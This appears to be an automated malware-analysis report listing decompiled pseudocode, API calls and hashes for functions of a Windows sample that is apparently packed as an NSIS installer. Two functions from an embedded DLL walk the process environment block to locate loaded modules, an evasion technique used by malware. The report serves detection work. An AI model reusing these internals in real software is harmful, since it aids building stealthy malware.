                                                                                Function 004059FF, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 74%
                                                                                			E004059FF(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				signed int _t73;
				signed char _t74;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42365c - 4 + _t36 * 4);
				}
				_t73 =  *0x423eb8 + _t36;
				_t37 = 0x422e20;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x422e20;
				if(_a4 - 0x422e20 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E004059FF(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x422e20;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x424000;
							E004059DD(_t84, (_t93 << 0xa) + 0x424000);
						} else {
							E0040593B(_t84,  *0x423e88);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405C3B(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f04;
						if( *0x423f04 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x423e84;
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x423e88,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x423e88,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x423eb8;
							E004058C4(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423eb8, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E004059FF(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E004059DD(_a4, _t37);
			}





























                                                                                0x004059ff
                                                                                0x004059ff
                                                                                0x004059ff
                                                                                0x00405a05
                                                                                0x00405a0a
                                                                                0x00405a1b
                                                                                0x00405a1b
                                                                                0x00405a26
                                                                                0x00405a28
                                                                                0x00405a2d
                                                                                0x00405a30
                                                                                0x00405a31
                                                                                0x00405a38
                                                                                0x00405a3a
                                                                                0x00405a40
                                                                                0x00405a43
                                                                                0x00405a43
                                                                                0x00405c18
                                                                                0x00405c18
                                                                                0x00405c1c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405a50
                                                                                0x00405a56
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405a5c
                                                                                0x00405a5d
                                                                                0x00405a60
                                                                                0x00405a63
                                                                                0x00405c0b
                                                                                0x00405c15
                                                                                0x00405c17
                                                                                0x00405c17
                                                                                0x00405c0d
                                                                                0x00405c0f
                                                                                0x00405c11
                                                                                0x00405c12
                                                                                0x00405c12
                                                                                0x00000000
                                                                                0x00405c0b
                                                                                0x00405a69
                                                                                0x00405a6d
                                                                                0x00405a72
                                                                                0x00405a81
                                                                                0x00405a84
                                                                                0x00405a86
                                                                                0x00405a8b
                                                                                0x00405a8e
                                                                                0x00405a91
                                                                                0x00405a94
                                                                                0x00405a97
                                                                                0x00405a9a
                                                                                0x00405bb5
                                                                                0x00405bb8
                                                                                0x00405be8
                                                                                0x00405beb
                                                                                0x00405bf0
                                                                                0x00405bf4
                                                                                0x00405bf4
                                                                                0x00405bf9
                                                                                0x00405bfa
                                                                                0x00405bff
                                                                                0x00405c02
                                                                                0x00405c04
                                                                                0x00000000
                                                                                0x00405c04
                                                                                0x00405bba
                                                                                0x00405bbd
                                                                                0x00405bd2
                                                                                0x00405bd9
                                                                                0x00405bbf
                                                                                0x00405bc6
                                                                                0x00405bc6
                                                                                0x00405be1
                                                                                0x00405be4
                                                                                0x00405bad
                                                                                0x00405bae
                                                                                0x00405bae
                                                                                0x00000000
                                                                                0x00405be4
                                                                                0x00405aa2
                                                                                0x00405aa3
                                                                                0x00405aa9
                                                                                0x00405aab
                                                                                0x00405ac5
                                                                                0x00405ac5
                                                                                0x00405acc
                                                                                0x00405acc
                                                                                0x00405ad3
                                                                                0x00405ad7
                                                                                0x00405ad7
                                                                                0x00405ad8
                                                                                0x00405ada
                                                                                0x00405b13
                                                                                0x00405b16
                                                                                0x00405b26
                                                                                0x00405b29
                                                                                0x00405b31
                                                                                0x00405b37
                                                                                0x00405b37
                                                                                0x00405b93
                                                                                0x00405b93
                                                                                0x00405b95
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405b3b
                                                                                0x00405b42
                                                                                0x00405b43
                                                                                0x00405b45
                                                                                0x00405b5f
                                                                                0x00405b6d
                                                                                0x00405b73
                                                                                0x00405b75
                                                                                0x00405b90
                                                                                0x00405b90
                                                                                0x00405b90
                                                                                0x00000000
                                                                                0x00405b90
                                                                                0x00405b7b
                                                                                0x00405b86
                                                                                0x00405b8c
                                                                                0x00405b8e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405b8e
                                                                                0x00405b47
                                                                                0x00405b4a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405b59
                                                                                0x00405b5b
                                                                                0x00405b5d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405b5d
                                                                                0x00000000
                                                                                0x00405b93
                                                                                0x00405b1e
                                                                                0x00000000
                                                                                0x00405adc
                                                                                0x00405ae1
                                                                                0x00405af7
                                                                                0x00405afc
                                                                                0x00405aff
                                                                                0x00405b9c
                                                                                0x00405b9c
                                                                                0x00405ba0
                                                                                0x00405ba8
                                                                                0x00405ba8
                                                                                0x00000000
                                                                                0x00405ba0
                                                                                0x00405b09
                                                                                0x00405b97
                                                                                0x00405b97
                                                                                0x00405b9a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405b9a
                                                                                0x00405ada
                                                                                0x00405aad
                                                                                0x00405ab1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405ab3
                                                                                0x00405ab7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405ab9
                                                                                0x00405abd
                                                                                0x00000000
                                                                                0x00405abf
                                                                                0x00405abf
                                                                                0x00000000
                                                                                0x00405abf
                                                                                0x00405abd
                                                                                0x00405c22
                                                                                0x00405c2c
                                                                                0x00405c38
                                                                                0x00405c38
                                                                                0x00000000

                                                                                APIs
                                                                                • GetVersion.KERNEL32(?,0041FC50,00000000,00404DB3,0041FC50,00000000), ref: 00405AA3
                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00405B1E
                                                                                • GetWindowsDirectoryA.KERNEL32(Bgcedtxsf,00000400), ref: 00405B31
                                                                                • SHGetSpecialFolderLocation.SHELL32(?,0040F020), ref: 00405B6D
                                                                                • SHGetPathFromIDListA.SHELL32(0040F020,Bgcedtxsf), ref: 00405B7B
                                                                                • CoTaskMemFree.OLE32(0040F020), ref: 00405B86
                                                                                • lstrcatA.KERNEL32(Bgcedtxsf,\Microsoft\Internet Explorer\Quick Launch), ref: 00405BA8
                                                                                • lstrlenA.KERNEL32(Bgcedtxsf,?,0041FC50,00000000,00404DB3,0041FC50,00000000), ref: 00405BFA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                • String ID: Bgcedtxsf$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                • API String ID: 900638850-3551142770
                                                                                • Opcode ID: f2902d36c7bc5f147b17eae451f34c87ef6b1ecb2a701ea89db72e6d8c0512ea
                                                                                • Instruction ID: 6e0a9cea976d255fe8f885264c58f53d842855ca50e9adf64a0c8d401e5358dc
                                                                                • Opcode Fuzzy Hash: f2902d36c7bc5f147b17eae451f34c87ef6b1ecb2a701ea89db72e6d8c0512ea
                                                                                • Instruction Fuzzy Hash: 35512971A04A05AADB216F24CC84B7F3BB4EB56324F14023BE911B62E1D37C6942DF5E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402020, Relevance: 3.1, APIs: 2, Instructions: 134comCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 74%
                                                                                			E00402020() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029F6(0xfffffff0);
				_t96 = E004029F6(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029F6(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029F6(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029F6(0x45);
				if(E0040553D(_t96) == 0) {
					E004029F6(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, 0x429800);
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409348, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409348, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                                0x00402029
                                                                                0x00402033
                                                                                0x0040203c
                                                                                0x00402046
                                                                                0x0040204f
                                                                                0x00402059
                                                                                0x0040205d
                                                                                0x0040205d
                                                                                0x00402062
                                                                                0x00402073
                                                                                0x0040207b
                                                                                0x0040215b
                                                                                0x0040215b
                                                                                0x00402162
                                                                                0x00402081
                                                                                0x00402081
                                                                                0x00402092
                                                                                0x00402096
                                                                                0x0040209c
                                                                                0x004020a6
                                                                                0x004020a8
                                                                                0x004020b3
                                                                                0x004020b6
                                                                                0x004020c3
                                                                                0x004020c5
                                                                                0x004020c7
                                                                                0x004020ce
                                                                                0x004020d1
                                                                                0x004020d1
                                                                                0x004020d4
                                                                                0x004020de
                                                                                0x004020e6
                                                                                0x004020eb
                                                                                0x004020f7
                                                                                0x004020f7
                                                                                0x004020fa
                                                                                0x00402103
                                                                                0x00402106
                                                                                0x0040210f
                                                                                0x00402114
                                                                                0x00402126
                                                                                0x00402135
                                                                                0x00402137
                                                                                0x00402143
                                                                                0x00402143
                                                                                0x00402135
                                                                                0x00402145
                                                                                0x0040214b
                                                                                0x0040214b
                                                                                0x0040214e
                                                                                0x00402154
                                                                                0x00402159
                                                                                0x0040216e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402159
                                                                                0x00402164
                                                                                0x0040288e
                                                                                0x0040289a

                                                                                APIs
                                                                                • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409348,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ByteCharCreateInstanceMultiWide
                                                                                • String ID:
                                                                                • API String ID: 123533781-0
                                                                                • Opcode ID: ce78064dd9e54383ff77b2edb8cfb72466764d900a9f718146dc1df03757c814
                                                                                • Instruction ID: ce0b4858a9f81ea3ddc308d80d774a06bef6b406c5dcff46aa6a4b0d76e862c7
                                                                                • Opcode Fuzzy Hash: ce78064dd9e54383ff77b2edb8cfb72466764d900a9f718146dc1df03757c814
                                                                                • Instruction Fuzzy Hash: AE418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040263E, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 39%
                                                                                			E0040263E(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029F6(2), _t19 - 0x1a4) != 0xffffffff) {
					E0040593B(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E004059DD();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                0x00402656
                                                                                0x0040266a
                                                                                0x00402675
                                                                                0x00402676
                                                                                0x004027b1
                                                                                0x00402658
                                                                                0x00402658
                                                                                0x0040265a
                                                                                0x0040265c
                                                                                0x0040265c
                                                                                0x0040288e
                                                                                0x0040289a

                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID:
                                                                                • API String ID: 1974802433-0
                                                                                • Opcode ID: eb2793427f1fe668a6a6503d5477a623d2e2cb2bd80a707e24d64e09a5bb41ff
                                                                                • Instruction ID: 14dcf34609860af9969e045d3f077fc7a18bb2554c958aa599433bfc977b1d94
                                                                                • Opcode Fuzzy Hash: eb2793427f1fe668a6a6503d5477a623d2e2cb2bd80a707e24d64e09a5bb41ff
                                                                                • Instruction Fuzzy Hash: 86F0E572A04101DFD700EBB49E49AEEB778DF51328FA0067BF101F20C1D2B84A45DB2A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 100058FE, Relevance: .0, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E100058FE(void* __eflags, intOrPtr* _a4) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _t35;

				_v16 =  *[fs:0x30];
				_v12 =  *((intOrPtr*)(_v16 + 0xc));
				_v20 =  *((intOrPtr*)(_v12 + 0xc));
				_v8 =  *((intOrPtr*)(_v12 + 0xc));
				while(E10005842(_t35,  *((intOrPtr*)(_v8 + 0x30)), _a4) != 0) {
					_v8 =  *_v8;
					if(_v8 != _v20) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_v8 + 0x28));
			}








                                                                                0x1000590a
                                                                                0x10005913
                                                                                0x1000591c
                                                                                0x10005925
                                                                                0x10005928
                                                                                0x10005947
                                                                                0x10005950
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x10005952
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.235807350.0000000010004000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.235775448.0000000010000000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235794772.0000000010001000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235800984.0000000010003000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235820043.0000000010006000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                • Instruction ID: 7119ab5d64daa319abc7f19591edba742b768f700897d6dad46e0c50cecef8ab
                                                                                • Opcode Fuzzy Hash: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                • Instruction Fuzzy Hash: 2D014C78A10249EFDB81DF98C58099DBBF4FB08260F118495EC58E7311E331AE509B40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 100056FB, Relevance: .0, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E100056FB() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



                                                                                0x10005712

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.235807350.0000000010004000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.235775448.0000000010000000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235794772.0000000010001000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235800984.0000000010003000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235820043.0000000010006000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                                • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                                • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                                • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403526, Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216stringregistrylibraryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E00403526() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t86;

				_t81 =  *0x423e90;
				_t20 = E00405CFB(6);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420478;
					"1033" = 0x7830;
					E004058C4(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420478, 0);
					__eflags =  *0x420478;
					if(__eflags == 0) {
						E004058C4(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420478, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E0040593B("1033",  *_t20() & 0x0000ffff);
				}
				E004037EF(_t76, _t88);
				 *0x423f00 =  *0x423e98 & 0x00000020;
				 *0x423f1c = 0x10000;
				if(E004055B1(_t88, 0x429400) != 0) {
					L16:
					if(E004055B1(_t96, 0x429400) == 0) {
						E004059FF(0, _t79, _t81, 0x429400,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423e80, 0x67, 1, 0, 0, 0x8040);
					 *0x423668 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004037EF(_t76, __eflags);
							__eflags =  *0x423f20;
							if( *0x423f20 != 0) {
								_t31 = E00404E4D(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42364c;
								if( *0x42364c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420450, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t86 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t86, 0x423620);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423620);
								 *0x423644 = _t86;
								RegisterClassA(0x423620);
							}
							_t42 = DialogBoxParamA( *0x423e80,  *0x423660 + 0x00000069 & 0x0000ffff, 0, E004038BC, 0);
							E00403476(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423e80;
						 *0x423634 = _t28;
						_v20 = 0x624e5f;
						 *0x423624 = E00401000;
						 *0x423630 =  *0x423e80;
						 *0x423644 =  &_v20;
						if(RegisterClassA(0x423620) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420450 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423e80, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x422e20;
					E004058C4( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x423eb8, 0x422e20, 0);
					_t62 =  *0x422e20; // 0x42
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422e21;
						 *((char*)(E004054FB(0x422e21, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E004059DD(0x429400, E004054D0(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405517(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                0x0040352c
                                                                                0x00403535
                                                                                0x0040353c
                                                                                0x0040353e
                                                                                0x00403552
                                                                                0x00403564
                                                                                0x0040356e
                                                                                0x00403573
                                                                                0x00403579
                                                                                0x0040358c
                                                                                0x0040358c
                                                                                0x00403597
                                                                                0x00403540
                                                                                0x0040354b
                                                                                0x0040354b
                                                                                0x0040359c
                                                                                0x004035af
                                                                                0x004035b4
                                                                                0x004035c5
                                                                                0x0040364c
                                                                                0x00403654
